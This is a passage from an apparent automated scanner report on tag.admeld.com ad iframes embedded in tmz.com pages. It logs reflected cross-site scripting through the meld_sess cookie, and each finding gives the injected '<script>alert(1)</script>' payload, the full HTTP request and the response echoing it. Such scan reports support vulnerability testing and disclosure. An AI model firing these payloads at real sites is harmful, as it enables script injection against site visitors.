IsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgIiIsICBob3N0OiAgICAgICAgICJuai10YWc0NCJ9
Content-Length: 2154
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:03:40 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=63e2c778-f3e1-4d02-8ee2-261dfa64843d5f2f8"><script>alert(1)</script>d9701c1d148&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d5f2f8">
...[SNIP]...

1.281. http://tag.admeld.com/ad/iframe/221/tmz/300x250/homepage_inpost [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/221/tmz/300x250/homepage_inpost

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e11e"><script>alert(1)</script>ddf927b755e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/221/tmz/300x250/homepage_inpost?t=1300831418910&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=63e2c778-f3e1-4d02-8ee2-261dfa64843d4e11e"><script>alert(1)</script>ddf927b755e; D41U=3neZURdpqdwqeL6TvOZ4lCJ-xdkcbEl9uqP_nBl1mlktEZOzu-6D2NQ

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMjIxLCAgc2l0ZTogICAgICAgICAidG16IiwgIGFkOiAgICAgICAgICAgMTYwMzkxMCwgIG5ldHdvcms6ICAgICAgImFkY29tIiwgIHNpemU6ICAgICAgICAgIjMwMHgyNTAiLCAgZnJlcTogICAgICAgICAiMS01IiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICJkM2QwMTdlYy1kNWMwLTQzMmYtOGM2Yy1mZjI1NDk3OTZhNjkiLCAgdXNlcjogICAgICAgICAiNjNlMmM3NzgtZjNlMS00ZDAyLThlZTItMjYxZGZhNjQ4NDNkNGUxMWUiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD5kZGY5MjdiNzU1ZSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiaG9tZXBhZ2VfaW5wb3N0IiwgIGRpdjogICAgICAgICAgImQzZDAxN2VjLWQ1YzAtNDMyZi04YzZjLWZmMjU0OTc5NmE2OSIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LnRtei5jb20vIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMSwgIGFjY291bnRfaWQ6ICAgNDgzMTEsICBuZXR3b3JrX25hbWU6ICJBZHZlcnRpc2luZy5jb20gKEZpeGVkKSIsICBwdWJsaXNoZXJfbmFtZTogInRteiIsICBlY3BtOiAgICAgICAgICIwLjY0IiwgIGZlY3BtOiAgICAgICAgIjAuNjQiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgImhvbWVwYWdlX2lucG9zdCIsICBydWxlOiAgICAgICAgICJob21lcGFnZV9pbnBvc3QiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxNDA3MTEsICJidXkiOjE3NiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMDI3MzQsICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUcmlnZ2l0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjU4ODk1LCAiYnV5IjoxMjQzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlhBLm5ldCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjI2MjEyNCwgImJ1eSI6MjAzNiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJBY3VpdHkgQWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTkwMTI2NSwgImJ1eSI6NTIxMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkVxYWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTcxMzk4NiwgImJ1eSI6NDI1MSwibHAiOiJodHRwOi8vd3d3LmVxYWRzLmNvbS8iLCJhbiI6IiIsInN0YXR1cyI6IjAuMjAiLCJmaWQiOjQwNywgImZjcG0iOiIwLjI1In1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzQwIn0=
Content-Length: 2154
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:03:40 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d4e11e"><script>alert(1)</script>ddf927b755e&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.282. http://tag.admeld.com/ad/iframe/221/tmz/300x250/ros_inpage [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/221/tmz/300x250/ros_inpage

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51691"><script>alert(1)</script>7078c1beb52 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/221/tmz/300x250/ros_inpage?t=1300831447299&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F03%2F22%2Fchris-pontius-party-boy-jackass-divorce-claire-nolan%2F&refer=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/03/22/chris-pontius-party-boy-jackass-divorce-claire-nolan/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=63e2c778-f3e1-4d02-8ee2-261dfa64843d51691"><script>alert(1)</script>7078c1beb52; D41U=3neZURdpqdwqeL6TvOZ4lCJ-xdkcbEl9uqP_nBl1mlktEZOzu-6D2NQ

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMjIxLCAgc2l0ZTogICAgICAgICAidG16IiwgIGFkOiAgICAgICAgICAgMTYwMzkxMCwgIG5ldHdvcms6ICAgICAgImFkY29tIiwgIHNpemU6ICAgICAgICAgIjMwMHgyNTAiLCAgZnJlcTogICAgICAgICAiMS01IiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICIxM2M2ZDNjNS1iMjFjLTQ4ZDQtOWZmNS00Y2E3NzUyYzZmYTMiLCAgdXNlcjogICAgICAgICAiNjNlMmM3NzgtZjNlMS00ZDAyLThlZTItMjYxZGZhNjQ4NDNkNTE2OTEiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD43MDc4YzFiZWI1MiIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAicm9zX2lucGFnZSIsICBkaXY6ICAgICAgICAgICIxM2M2ZDNjNS1iMjFjLTQ4ZDQtOWZmNS00Y2E3NzUyYzZmYTMiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy50bXouY29tLzIwMTEvMDMvMjIvY2hyaXMtcG9udGl1cy1wYXJ0eS1ib3ktamFja2Fzcy1kaXZvcmNlLWNsYWlyZS1ub2xhbi8iLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAxLCAgYWNjb3VudF9pZDogICA0ODMxMSwgIG5ldHdvcmtfbmFtZTogIkFkdmVydGlzaW5nLmNvbSAoRml4ZWQpIiwgIHB1Ymxpc2hlcl9uYW1lOiAidG16IiwgIGVjcG06ICAgICAgICAgIjAuNjQiLCAgZmVjcG06ICAgICAgICAiMC42NCIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAicm9zX2lucGFnZSIsICBydWxlOiAgICAgICAgICJyb3NfaW5wYWdlIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTQwNzExLCAiYnV5IjoxNzYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjAyNzM0LCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHJpZ2dpdCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjI1ODg5NSwgImJ1eSI6MTI0MywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJYQS5uZXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyNjIxMjQsICJidXkiOjIwMzYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiQWN1aXR5IEFkcyAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjE5MDEyNjUsICJidXkiOjUyMTAsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJFcWFkcyAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjE3MTM5ODYsICJidXkiOjQyNTEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzI2In0=
Content-Length: 2154
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:04:33 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=63e2c778-f3e1-4d02-8ee2-261dfa64843d51691"><script>alert(1)</script>7078c1beb52&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d51691">
...[SNIP]...

1.283. http://tag.admeld.com/ad/iframe/221/tmz/300x250/ros_inpage [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/221/tmz/300x250/ros_inpage

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1b27"><script>alert(1)</script>306e75acee2 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/221/tmz/300x250/ros_inpage?t=1300831447299&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F03%2F22%2Fchris-pontius-party-boy-jackass-divorce-claire-nolan%2F&refer=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/03/22/chris-pontius-party-boy-jackass-divorce-claire-nolan/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=63e2c778-f3e1-4d02-8ee2-261dfa64843dc1b27"><script>alert(1)</script>306e75acee2; D41U=3neZURdpqdwqeL6TvOZ4lCJ-xdkcbEl9uqP_nBl1mlktEZOzu-6D2NQ

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMjIxLCAgc2l0ZTogICAgICAgICAidG16IiwgIGFkOiAgICAgICAgICAgMTYwMzkxMCwgIG5ldHdvcms6ICAgICAgImFkY29tIiwgIHNpemU6ICAgICAgICAgIjMwMHgyNTAiLCAgZnJlcTogICAgICAgICAiMS01IiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICI0ZmQ3MDQ2ZC1hMTIzLTRkZDctODIwYy1iNjhiMDVmNDNhMmYiLCAgdXNlcjogICAgICAgICAiNjNlMmM3NzgtZjNlMS00ZDAyLThlZTItMjYxZGZhNjQ4NDNkYzFiMjciPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4zMDZlNzVhY2VlMiIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAicm9zX2lucGFnZSIsICBkaXY6ICAgICAgICAgICI0ZmQ3MDQ2ZC1hMTIzLTRkZDctODIwYy1iNjhiMDVmNDNhMmYiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy50bXouY29tLzIwMTEvMDMvMjIvY2hyaXMtcG9udGl1cy1wYXJ0eS1ib3ktamFja2Fzcy1kaXZvcmNlLWNsYWlyZS1ub2xhbi8iLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAxLCAgYWNjb3VudF9pZDogICA0ODMxMSwgIG5ldHdvcmtfbmFtZTogIkFkdmVydGlzaW5nLmNvbSAoRml4ZWQpIiwgIHB1Ymxpc2hlcl9uYW1lOiAidG16IiwgIGVjcG06ICAgICAgICAgIjAuNjQiLCAgZmVjcG06ICAgICAgICAiMC42NCIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAicm9zX2lucGFnZSIsICBydWxlOiAgICAgICAgICJyb3NfaW5wYWdlIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTQwNzExLCAiYnV5IjoxNzYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMDI3MzQsICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlRyaWdnaXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyNTg4OTUsICJidXkiOjEyNDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJYQS5uZXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyNjIxMjQsICJidXkiOjIwMzYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJBY3VpdHkgQWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTkwMTI2NSwgImJ1eSI6NTIxMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkVxYWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTcxMzk4NiwgImJ1eSI6NDI1MSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnMzIifQ==
Content-Length: 2154
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:04:33 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843dc1b27"><script>alert(1)</script>306e75acee2&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.284. http://tag.admeld.com/ad/iframe/221/tmz/300x250/tremor-300x250 [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/221/tmz/300x250/tremor-300x250

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c556c"><script>alert(1)</script>521fef51a86 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/221/tmz/300x250/tremor-300x250?t=1300831445909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.tmz.com%2Fsignin%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/signin/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=63e2c778-f3e1-4d02-8ee2-261dfa64843dc556c"><script>alert(1)</script>521fef51a86; D41U=3neZURdpqdwqeL6TvOZ4lCJ-xdkcbEl9uqP_nBl1mlktEZOzu-6D2NQ

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMjIxLCAgc2l0ZTogICAgICAgICAidG16IiwgIGFkOiAgICAgICAgICAgMjg3ODE3MCwgIG5ldHdvcms6ICAgICAgInRyZW1vciIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtMSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiMTY0ZmZhMzQtOTljYS00YjYwLWI4NjYtNTM1NDUzOWM1ZTRiIiwgIHVzZXI6ICAgICAgICAgIjYzZTJjNzc4LWYzZTEtNGQwMi04ZWUyLTI2MWRmYTY0ODQzZGM1NTZjIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+NTIxZmVmNTFhODYiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInRyZW1vci0zMDB4MjUwIiwgIGRpdjogICAgICAgICAgIjE2NGZmYTM0LTk5Y2EtNGI2MC1iODY2LTUzNTQ1MzljNWU0YiIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LnRtei5jb20vc2lnbmluLyIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJhZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDQ0LCAgYWNjb3VudF9pZDogICA3MzAyNSwgIG5ldHdvcmtfbmFtZTogIlRyZW1vciBNZWRpYSAoVE1aKSIsICBwdWJsaXNoZXJfbmFtZTogInRteiIsICBlY3BtOiAgICAgICAgICIyLjAwIiwgIGZlY3BtOiAgICAgICAgIjIuMDAiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgInRyZW1vci0zMDB4MjUwIiwgIHJ1bGU6ICAgICAgICAgInRyZW1vci0zMDB4MjUwIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTQwNzExLCAiYnV5IjoxNzYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjAyNzM0LCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUcmlnZ2l0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjU4ODk1LCAiYnV5IjoxMjQzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlhBLm5ldCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjI2MjEyNCwgImJ1eSI6MjAzNiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJBY3VpdHkgQWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTkwMTI2NSwgImJ1eSI6NTIxMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkVxYWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTcxMzk4NiwgImJ1eSI6NDI1MSwibHAiOiJodHRwOi8vd3d3LmVxYWRzLmNvbS8iLCJhbiI6IiIsInN0YXR1cyI6IjAuMjAiLCJmaWQiOjQwNywgImZjcG0iOiIwLjI1In1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzM1In0=
Content-Length: 2400
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:04:28 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
